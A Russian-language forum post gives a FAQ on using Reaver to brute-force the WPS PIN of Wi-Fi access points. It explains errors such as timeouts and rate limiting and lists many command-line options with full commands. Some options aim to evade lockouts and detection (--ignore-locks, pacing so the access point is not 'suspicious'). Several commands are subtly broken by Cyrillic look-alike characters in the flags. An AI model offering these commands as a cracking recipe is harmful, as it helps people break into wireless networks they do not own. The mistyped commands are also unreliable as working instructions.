1.Уровень сигнала 2.Reaver это все таки brut force и у кого то PIN начинался с 1111 а у кого то 9999 алгоритм работы reaver, сперва пины по default а затем по порядку. –S все таки полезная функция. 3.Защита на AP. Перезапуск с –vv а не просто -v дает более обширную информация что происходит с АР. У многих возникали вопросы по поводу reaver, вот не большой FAQ по материалам сети с небольшими комментами от меня. Думаю, он будет полезен. Почему возникают ошибки "timeout" и "out of order"? - Обычно это происходит из-за низкого уровня сигнала и плохой связи сточкой доступа. Кроме того, точка доступа может на время заблокировать использование WPS. Почему при плохом сигнале Reaver работает плохо, хотя тот же взлом WEP проходит нормально? - Взлом WEP происходит путем повторной пересылки перехваченных пакетов, чтобы получить векторы инициализации (IV), необходимых для успешного взлома. В этом случае неважно, потерялся какой-либо пакет, либо как-то был поврежден по пути. А вот для атаки на WPS необходимо строгое следование протоколу передачи пакетов между точкой доступа и Reaver для проверки каждого PIN-кода. Это делает атаки на WPS гораздо более зависимыми от уровня сигнала. Важно помнить, что если твой беспроводной адаптер видит точку доступа, то это ещё не значит, что и точка доступа видит тебя. Почему я постоянно получаю ошибки "rate limiting detected"? - Точка доступа заблокировала WPS. Обычно блокировка длится около пяти минут, но в некоторых случаях возможна полная “падение” АР - и только reset способен вернуть точку к “жизни”. Дополнительные опции, Reaver, которые могут повысить эффективность перебора ключа WPS. Можно задать номер канала -с и -е SSID точки доступа: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx (-S) '--dh-small' Полезная опция, которая задает небольшое значение PIN, тем самым облегчая работу reaver: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --dh-small (-t) --timeout Таймаут ожидания ответа по умолчанию равен пяти секундам. При необходимости его можно изменить: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -t 2 (-d) --delay Задержка между попытками по умолчанию равна одной секунде. Она также может быть настроена: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -d 5 (-l) --lock-delay Некоторые точки доступа могут блокировать WPS на определенное время. Reaver делает паузу в переборе на 315 секунд по умолчанию, длительность этой паузы можно менять: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --lock-delay=320 (-n) --nack Некоторые реализации протокола WPS разрывают соединение при неправильном PIN-коде, хотя по спецификации должны возвращать особое сообщение. Reaver автоматически распознает такую ситуацию, для этого существует опция: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --nаск' (-E) --eap-terminate. Опция предназначена для работы с теми АР, которые требуют завершения WPS-сессии с помощью сообщения ЕАР FAIL: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --eap-terminate (-L), --ignore-locks Игнорирование блокировки WPS-сессии. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --ignore-locks (-x) --fail-wait. Возникновение ошибок в WPS-сессии может означать, что АР ограничивает число попыток ввода PIN-кода, либо просто перегружена запросами. В этом случае Reaver приостанавливает свою деятельность после 10 попыток, на установленную временную паузу. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --fail-wait=360 (-T), --m57-timeout Установка интервала времени для M5/M7 - иногда помогает. По умолчанию 0.1 возможно увеличение до 1 сек. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -T .5 (-A), --no-associate. Отмена авторизации на АР, немного ускоряет процесс перебора PIN. reaver -i mon0 -А -b 00:00:00:00:00:00 -с 11 -е xxxxxx Авторизация должна быть запущенна отдельно. aireplay-ng mon0 -1 120 -a 00:00:00:00:00:00 -е xxxxxx (-p), --pin Если PIN уже подобран - иногда помогает увидеть WPA в “нормальном” виде (не НЕХ). Или возможен перебор сразу с установленного интервала, если вы уверены что ваш PIN начинается, скажем, с 3000. А также для теста. (Значение 4 или 8 цифр). reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --pin 3000 (-g), --max-attempts и -w, --win7. Здесь думаю объяснять не нужно. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx –w –g 15 -r, --recurring-delay Интересная функция позволяет приостановить перебор на определенное время после определенного количества попыток и затем его продолжить, не создавая лишнего “подозрения” у АР. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -r 8:20